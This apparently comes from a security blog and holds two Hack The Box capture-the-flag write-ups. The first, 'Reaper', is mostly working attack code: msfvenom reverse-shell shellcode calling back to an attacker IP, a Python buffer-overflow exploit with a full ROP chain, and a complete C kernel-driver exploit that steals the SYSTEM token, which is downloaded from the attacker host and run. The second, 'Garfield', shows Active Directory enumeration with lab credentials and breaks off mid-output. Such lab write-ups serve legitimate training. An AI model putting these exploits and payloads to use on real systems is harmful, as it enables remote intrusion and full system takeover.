AdverXarial

HTB Reaper - Windows (Insane)

Sulaiman — Mon, 27 Apr 2026 13:52:16 GMT

From HTB: -

This write-up is going to be straight-forward:

Gain User
Gain NT SYSTEM

Network Enumeration and Port Discovery

┌──(byt3n33dl3㉿kali)-[~]
└─$ ping -c2 10.129.234.200
PING 10.129.234.200 (10.129.234.200) 56(84) bytes of data.
64 bytes from 10.129.234.200: icmp_seq=1 ttl=127 time=112 ms

--- 10.129.234.200 ping statistics ---
2 packets transmitted, 1 received, 50% packet loss, time 1008ms
rtt min/avg/max/mdev = 112.315/112.315/112.315/0.000 ms

Continue with Nmap Scanning:

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 10.129.234.200 -oA nmap/nmap
[sudo] password for byt3n33dl3: 
Starting Nmap 7.98 ( https://nmap.org ) at 
Nmap scan report for 10.129.234.200
Host is up (0.12s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
3389/tcp open  ms-wbt-server
4141/tcp open  oirtgsvc
5040/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in seconds

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo nmap -Pn -p21,80,3389,4141,5040 -sC -sV 10.129.234.200 -oA nmap/nmap-port
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for 10.129.234.200
Host is up (0.11s latency).

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 08-15-23  12:12AM                  262 dev_keys.txt
|_08-14-23  02:53PM               187392 dev_keysvc.exe
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows                                                                                                                                                                                                                   
3389/tcp open  ms-wbt-server Microsoft Terminal Services                                                                                                                                                                                    
| ssl-cert: Subject: commonName=reaper                                                                                                                                                                                                      
| Not valid before: 2026-04-03T15:22:10                                                                                                                                                                                                     
|_Not valid after:  2026-10-03T15:22:10                                                                                                                                                                                                     
4141/tcp open  oirtgsvc?                                                                                                                                                                                                                    
| fingerprint-strings:                                                                                                                                                                                                                      
|   GenericLines:                                                                                                                                                                                                                           
|     Choose an option:                                                                                                                                                                                                                     
|     Activate key                                                                                                                                                                                                                          
. . .[SNIP]. . .
|     Activate key
|_    Exit
5040/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4141-TCP:V=7.98%I=7%D=4/4%Time=69D12DE4%P=x86_64-pc-linux-gnu%r(NUL
. . .[SNIP]. . .
SF:\0Choose\x20an\x20option:\n1\.\x20Set\x20key\n2\.\x20Activate\x20key\n3
SF:\.\x20Exit\n");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 209.07 seconds

NMAP Scan reveal:

Anonymous FTP (Binary potential break-point)
Interactive Port (Potential Buffer)

Anonymous FTP

ftp> ls
229 Entering Extended Passive Mode (|||5001|)
150 Opening ASCII mode data connection.
08-15-23  12:12AM                  262 dev_keys.txt
08-14-23  02:53PM               187392 dev_keysvc.exe
226 Transfer complete.
ftp>

Attack Script for User Access

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=9001 -f python -v shellcode

MSFVenom Shellcode Script:

┌──(byt3n33dl3㉿kali)-[~]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.20 LPORT=9001 -f python -v shellcode
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of python file: 2571 bytes
shellcode =  b""
shellcode += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41"
shellcode += b"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48"
shellcode += b"\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20"
shellcode += b"\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31"
shellcode += b"\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"
shellcode += b"\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41"
shellcode += b"\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0"
shellcode += b"\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67"
shellcode += b"\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20"
shellcode += b"\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34"
shellcode += b"\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac"
shellcode += b"\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
shellcode += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
shellcode += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
shellcode += b"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
shellcode += b"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a"
shellcode += b"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41"
shellcode += b"\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
shellcode += b"\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f"
shellcode += b"\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81"
shellcode += b"\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02"
shellcode += b"\x00\x23\x29\x0a\x0a\x0e\x14\x41\x54\x49\x89"
shellcode += b"\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff"
shellcode += b"\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
shellcode += b"\xba\x29\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31"
shellcode += b"\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48"
shellcode += b"\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0"
shellcode += b"\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
shellcode += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff"
shellcode += b"\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
shellcode += b"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50"
shellcode += b"\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a\x0d"
shellcode += b"\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01"
shellcode += b"\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89"
shellcode += b"\xe6\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff"
shellcode += b"\xc0\x41\x50\x49\xff\xc8\x4d\x89\xc1\x4c\x89"
shellcode += b"\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48\x31"
shellcode += b"\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d"
shellcode += b"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6"
shellcode += b"\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
shellcode += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
shellcode += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"

Whole script (attack.py)

#!/usr/bin/python3
from pwn import remote, p64, base64

shell = remote("10.129.234.200", 4141)

shell.sendlineafter(b"Exit\n", b"1")
shell.sendlineafter(b"key: ", b"100-FE9A1-500-A270-0102-")
shell.sendlineafter(b"Exit\n", b"1")
shell.sendlineafter(b"key: ", b"%p")
shell.sendlineafter(b"Exit\n", b"2")
shell.recvuntil(b"Checking key: ")

binary_base = int(shell.recvline().strip(), 16) - 0x20660

offset = 88
junk = b"A" * offset

rop  = b""
rop += p64(binary_base + 0x020d9) # pop rbx; ret;
rop += p64(0x1000)                # flAllocationType
rop += p64(binary_base + 0x01f90) # mov r9, rbx; mov r8, 0; add rsp, 8; ret;
rop += p64(0x0)                   # padding for pop
rop += p64(binary_base + 0x03918) # add r8, r9; add rax, r8; ret;
rop += p64(binary_base + 0x0150a) # pop rax; ret;
rop += p64(binary_base + 0x0150a) # pop rax; ret;
rop += p64(binary_base + 0x047b3) # pop r13; ret;
rop += p64(0x40)                  # flProtect
rop += p64(binary_base + 0x0368f) # mov rdx, r13; call rax;
rop += p64(binary_base + 0x1f27f) # xor rax, rax; ret;
rop += p64(binary_base + 0x1f37d) # cmove r9, rdx; mov rax, r9; ret;
rop += p64(binary_base + 0x0150a) # pop rax; ret;
rop += p64(binary_base + 0x0150a) # pop rax; ret;
rop += p64(binary_base + 0x047b3) # pop r13; ret;
rop += p64(0x1)                   # dwSize
rop += p64(binary_base + 0x0368f) # mov rdx, r13; call rax;
rop += p64(binary_base + 0x020d9) # pop rbx; ret;
rop += p64(0x0)                   # key for xor
rop += p64(binary_base + 0x01fa0) # xor rbx, rsp; ret;
rop += p64(binary_base + 0x01fc2) # push rbx; pop rax; ret;
rop += p64(binary_base + 0x01f80) # mov rcx, rax; ret;
rop += p64(binary_base + 0x020d9) # pop rbx; ret;
rop += p64(binary_base + 0x20000) # VirtualAlloc()
rop += p64(binary_base + 0x1ec79) # jmp qword ptr [rbx];
rop += p64(binary_base + 0x02029) # add rsp, 0x10; ret;
rop += p64(0x0) * 2               # padding for add
rop += p64(binary_base + 0x1becd) # push rsp; and al, 8; ret;

shellcode =  b""
shellcode += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41"
shellcode += b"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48"
shellcode += b"\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20"
shellcode += b"\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31"
shellcode += b"\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20"
shellcode += b"\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41"
shellcode += b"\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0"
shellcode += b"\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67"
shellcode += b"\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20"
shellcode += b"\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34"
shellcode += b"\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac"
shellcode += b"\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1"
shellcode += b"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
shellcode += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
shellcode += b"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
shellcode += b"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a"
shellcode += b"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41"
shellcode += b"\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
shellcode += b"\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f"
shellcode += b"\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81"
shellcode += b"\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02"
shellcode += b"\x00\x23\x29\x0a\x0a\x0e\x14\x41\x54\x49\x89"
shellcode += b"\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff"
shellcode += b"\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41"
shellcode += b"\xba\x29\x80\x6b\x00\xff\xd5\x50\x50\x4d\x31"
shellcode += b"\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48"
shellcode += b"\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0"
shellcode += b"\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89"
shellcode += b"\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff"
shellcode += b"\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
shellcode += b"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50"
shellcode += b"\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a\x0d"
shellcode += b"\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01"
shellcode += b"\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89"
shellcode += b"\xe6\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff"
shellcode += b"\xc0\x41\x50\x49\xff\xc8\x4d\x89\xc1\x4c\x89"
shellcode += b"\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5\x48\x31"
shellcode += b"\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d"
shellcode += b"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6"
shellcode += b"\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
shellcode += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72"
shellcode += b"\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5"

payload  = b""
payload += junk
payload += rop
payload += shellcode

shell.sendlineafter(b"Exit\n", b"1")
shell.sendlineafter(b"key: ", b"100-FE9A1-500-A270-0102-" + base64.b64encode(payload))
shell.sendlineafter(b"Exit\n", b"2")

And gain Access:

┌──(byt3n33dl3㉿kali)-[~]
└─$ python3 attack.py
[+] Opening connection to 10.129.234.200 on port 4141: Done
[*] Closed connection to 10.129.234.200 port 4141

┌──(byt3n33dl3㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.20] from (UNKNOWN) [10.129.234.200] 58420
Microsoft Windows [Version 10.0.19045.6216]
(c) Microsoft Corporation. All rights reserved.

C:\keysvc>whoami
whoami
reaper\keysvc

C:\keysvc>hostname 
hostname
reaper

Discover Revers-able SYS

After enumeration, we found file containing path to SYSTEM access via binary hijack:

PS C:\keysvc> cd C:\driver                                                                                                                                                                                                                  
cd C:\driver                                                                                                                                                                                                                                
PS C:\driver> dir                                                                                                                                                                                                                           
dir                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            
    Directory: C:\driver


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         7/27/2023   9:12 AM           8432 reaper.sys                                                           


PS C:\driver>

Attack Script and Binary for NT SYSTEM Access

Finally we have everything to create out C based application, ready to be an executable:

#include 
#include 
#include 

#define IOCTL_ALLOC 0x80002003
#define IOCTL_FREE  0x80002007
#define IOCTL_COPY  0x8000200b

#define OFFSET_Token 0x4b8
#define OFFSET_UniqueProcessId 0X440
#define OFFSET_ActiveProcessLinks 0x448

#define QWORD ULONGLONG

typedef struct ReaperData {
    DWORD Magic;
    DWORD ThreadId;
    DWORD Priority;
    DWORD Empty;
    QWORD SrcAddress;
    QWORD DstAddress;
} ReaperData;

VOID ArbitraryWrite(HANDLE hDevice, QWORD what, QWORD where) {
    ReaperData userData;

    userData.Magic = 0x6a55cc9e;
    userData.ThreadId = GetCurrentThreadId();
    userData.Priority = 0;
    userData.SrcAddress = what;
    userData.DstAddress = where;

    DeviceIoControl(hDevice, IOCTL_ALLOC,(LPVOID) &userData, (DWORD) sizeof(struct ReaperData), NULL, 0, NULL, NULL);
    DeviceIoControl(hDevice, IOCTL_FREE, (LPVOID) NULL, (DWORD) 0, NULL, 0, NULL, NULL);
    DeviceIoControl(hDevice, IOCTL_COPY, (LPVOID) NULL, (DWORD) 0, NULL, 0, NULL, NULL);
}

QWORD ArbitraryRead(HANDLE hDevice, QWORD where) {
    QWORD output;
    ReaperData userData;

    userData.Magic = 0x6a55cc9e;
    userData.ThreadId = GetCurrentThreadId();
    userData.Priority = 0;
    userData.SrcAddress = where;
    userData.DstAddress = (QWORD) &output;

    DeviceIoControl(hDevice, IOCTL_ALLOC,(LPVOID) &userData, (DWORD) sizeof(struct ReaperData), NULL, 0, NULL, NULL);
    DeviceIoControl(hDevice, IOCTL_FREE, (LPVOID) NULL, (DWORD) 0, NULL, 0, NULL, NULL);
    DeviceIoControl(hDevice, IOCTL_COPY, (LPVOID) NULL, (DWORD) 0, NULL, 0, NULL, NULL);

    return output;
}

QWORD GetSystemEProcess(HANDLE hDevice, QWORD kernelBase) {
    HMODULE hKernel = LoadLibraryA("C:\\Windows\\System32\\ntoskrnl.exe");

    QWORD userPsInitialProcess = (QWORD) GetProcAddress(hKernel, "PsInitialSystemProcess");
    QWORD offsetPsInitialProcess = userPsInitialProcess - (QWORD) hKernel;
    QWORD kernelPsInitialProcess = kernelBase + offsetPsInitialProcess;

    QWORD systemEProcess = ArbitraryRead(hDevice, kernelPsInitialProcess);

    FreeLibrary(hKernel);
    return systemEProcess;
}

QWORD GetCurrentEProcess(HANDLE hDevice, QWORD systemEProcess) {
    QWORD currentEProcess = systemEProcess;
    DWORD currentProcessId = GetCurrentProcessId();

    while (TRUE) {
        QWORD processLinkAddress = ArbitraryRead(hDevice, currentEProcess + OFFSET_ActiveProcessLinks);
        QWORD processId = ArbitraryRead(hDevice, processLinkAddress - OFFSET_ActiveProcessLinks + OFFSET_UniqueProcessId);

        currentEProcess = processLinkAddress - OFFSET_ActiveProcessLinks;

        if ((DWORD) processId == currentProcessId) {
            break;
        }
    }

    return currentEProcess;
}

QWORD GetKernelBase() {
    LPVOID drivers[1024];
    DWORD cbNeeded;

    EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded);
    return (QWORD) drivers[0];
}

int main() {
    HANDLE hDevice = CreateFileA("\\\\.\\Reaper", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to get handle: 0x%x\n", GetLastError());
        exit(EXIT_FAILURE);
    }

    QWORD systemEProcess = GetSystemEProcess(hDevice, GetKernelBase());
    QWORD currentEProcess = GetCurrentEProcess(hDevice, systemEProcess);

    ArbitraryWrite(hDevice, systemEProcess + OFFSET_Token, currentEProcess + OFFSET_Token);
    CloseHandle(hDevice);

    system("cmd.exe");
    return 0;
}

Then convert:

┌──(byt3n33dl3㉿kali)-[~]
└─$ sudo x86_64-w64-mingw32-gcc pwn.c -o pwn.exe

┌──(byt3n33dl3㉿kali)-[~]
└─$ ll                                                                                                              
total 284
-rw-r--r-- 1 root root   3457 Apr  4 11:33 pwn.c
-rwxr-xr-x 1 root root 257644 Apr  4 11:34 pwn.exe
. . .[SNIP]. . .

Then ready to be downloaded and executed!!

PS C:\programdata> iwr -uri http://10.10.14.20/pwn.exe -outfile pwn.exe
iwr -uri http://10.10.14.20/pwn.exe -outfile pwn.exe
PS C:\programdata> .\pwn.exe
.\pwn.exe
Microsoft Windows [Version 10.0.19045.6216]
(c) Microsoft Corporation. All rights reserved.

C:\programdata>whoami
whoami
nt authority\system

C:\programdata>hostname
hostname
reaper

That’s it, we’re SYSTEM now!!

labs.hackthebox.com/achievement/machine/2489228/706

Until next time and Happy Hacking!

HTB Garfield - Windows (Hard)

Sulaiman — Mon, 27 Apr 2026 13:51:03 GMT

From HTB: -

This write-up is going to be fast-forward:

Gain User
Gain NT SYSTEM

An assumed breach scenario so we start with a creds:

user: j.arbuckle
passwd: Th1sD4mnC4t!@1978

Network Enumeration and Port Discovery

┌──(kali㉿kali)-[~]
└─$ ping -c2 10.129.195.37
PING 10.129.195.37 (10.129.195.37) 56(84) bytes of data.
64 bytes from 10.129.195.37: icmp_seq=1 ttl=127 time=384 ms
64 bytes from 10.129.195.37: icmp_seq=2 ttl=127 time=389 ms

--- 10.129.195.37 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 384.445/386.736/389.028/2.291 ms

Continue with Nmap Scan:

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p- --min-rate 8000 10.129.195.37 -oA nmap/nmap              
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for 10.129.195.37
Host is up (0.39s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
2179/tcp  open  vmrdp
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49899/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 17.78 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -p53,88,135,139,389,445,464,593,636,2179,3268-3269,3389,5985,9389 -sC -sV 10.129.195.37 -oA nmap/nmap-ports
Starting Nmap 7.98 ( https://nmap.org ) at
Nmap scan report for 10.129.195.37
Host is up (0.48s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: )
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: garfield.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2179/tcp open  vmrdp?
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: garfield.htb, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.garfield.htb
| Not valid before: 
|_Not valid after:
|_ssl-date: ; +8h04m04s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: GARFIELD
|   NetBIOS_Domain_Name: GARFIELD
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: garfield.htb
|   DNS_Computer_Name: DC01.garfield.htb
|   DNS_Tree_Name: garfield.htb
|   Product_Version: 10.0.17763
|_  System_Time:
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8h04m04s, deviation: 0s, median: 8h04m03s
| smb2-time: 
|   date: 
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in seconds

Pretty much there’s a lot in here, even RDP are available, more than that we also got our domain:

DC01.garfield.htb DC01 garfield.htb

So put it local.

Notes:

Clock SKEW gonna be brutal upon Kerberos
High Potential Spray

Protocols Enumeration with Credential

With the credential we check what we’ve got:

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap DC01.garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' 
LDAP        10.129.195.37   389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:garfield.htb) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.195.37   389    DC01             [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978

Moreover user J.Arbuckle can auth on:

SMB
LDAP
RDP

But not logon, we can have much users from here:

┌──(kali㉿kali)-[~]
└─$ sudo netexec ldap DC01.garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --users
LDAP        10.129.195.37   389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:garfield.htb) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.195.37   389    DC01             [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978 
LDAP        10.129.195.37   389    DC01             [*] Enumerated 7 domain users: garfield.htb
LDAP        10.129.195.37   389    DC01             -Username-                    -Last PW Set-       -BadPW-  -Description-                                               
LDAP        10.129.195.37   389    DC01             Administrator                 2025-10-03 13:29:26 0        Built-in account for administering the computer/domain      
LDAP        10.129.195.37   389    DC01             Guest                                      0        Built-in account for guest access to the computer/domain    
LDAP        10.129.195.37   389    DC01             krbtgt                        2025-08-13 07:05:26 0        Key Distribution Center Service Account                     
LDAP        10.129.195.37   389    DC01             krbtgt_8245                   2025-08-17 07:33:39 0        Key Distribution Center service account for read-only domain controller
LDAP        10.129.195.37   389    DC01             j.arbuckle                    2025-09-09 11:50:55 0                                                                    
LDAP        10.129.195.37   389    DC01             l.wilson                      2026-01-27 16:40:33 0                                                                    
LDAP        10.129.195.37   389    DC01             l.wilson_adm                  2026-01-13 09:56:35 2

Discover and Attack SMB Hijack

Further more we discover SMB shares, not much, we found a batch (.bat) files but on NetExec views we only saw “READ“ access:

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec smb DC01.garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --shares
SMB         10.129.195.37   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:garfield.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.195.37   445    DC01             [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978 
SMB         10.129.195.37   445    DC01             [*] Enumerated shares
SMB         10.129.195.37   445    DC01             Share           Permissions     Remark
SMB         10.129.195.37   445    DC01             -----           -----------     ------
SMB         10.129.195.37   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.195.37   445    DC01             C$                              Default share
SMB         10.129.195.37   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.195.37   445    DC01             NETLOGON        READ            Logon server share 
SMB         10.129.195.37   445    DC01             SYSVOL          READ            Logon server share

-M spider_plus modules:

┌──(kali㉿kali)-[~]
└─$ sudo faketime "$(ntpdate -q DC01 | cut -d ' ' -f 1,2)" netexec smb DC01.garfield.htb -u j.arbuckle -p 'Th1sD4mnC4t!@1978' --shares -M spider_plus
SMB         10.129.195.37   445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:garfield.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.195.37   445    DC01             [+] garfield.htb\j.arbuckle:Th1sD4mnC4t!@1978 
SPIDER_PLUS 10.129.195.37   445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.195.37   445    DC01             [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.195.37   445    DC01             [*]     STATS_FLAG: True
SPIDER_PLUS 10.129.195.37   445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.195.37   445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.195.37   445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.195.37   445    DC01             [*]  OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus
SMB         10.129.195.37   445    DC01             [*] Enumerated shares
SMB         10.129.195.37   445    DC01             Share           Permissions     Remark
SMB         10.129.195.37   445    DC01             -----           -----------     ------
SMB         10.129.195.37   445    DC01             ADMIN$                          Remote Admin
SMB         10.129.195.37   445    DC01             C$                              Default share
SMB         10.129.195.37   445    DC01             IPC$            READ            Remote IPC
SMB         10.129.195.37   445    DC01             NETLOGON        READ            Logon server share 
SMB         10.129.195.37   445    DC01             SYSVOL          READ            Logon server share 
SPIDER_PLUS 10.129.195.37   445    DC01             [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.129.195.37.json".
SPIDER_PLUS 10.129.195.37   445    DC01             [*] SMB Shares:           5 (ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.195.37   445    DC01             [*] SMB Readable Shares:  3 (IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.129.195.37   445    DC01             [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.129.195.37   445    DC01             [*] Total folders found:  20
SPIDER_PLUS 10.129.195.37   445    DC01             [*] Total files found:    8
SPIDER_PLUS 10.129.195.37   445    DC01             [*] File size average:    1.08 KB
SPIDER_PLUS 10.129.195.37   445    DC01             [*] File size min:        22 B
SPIDER_PLUS 10.129.195.37   445    DC01             [*] File size max:        3.81 KB
                                                                                                                                                                                                   
┌──(kali㉿kali)-[~]
└─$ sudo cat /root/.nxc/modules/nxc_spider_plus/10.129.195.37.json                                                                                   
{
    "NETLOGON": {
        "printerDetect.bat": {
            "atime_epoch": "2025-09-12 18:20:28",
            "ctime_epoch": "2025-09-12 18:20:17",
            "mtime_epoch": "2025-09-12 18:25:38",
            "size": "217 B"
        }
    },
    "SYSVOL": {
        "garfield.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2025-09-09 11:55:03",
            "ctime_epoch": "2025-08-13 07:04:48",
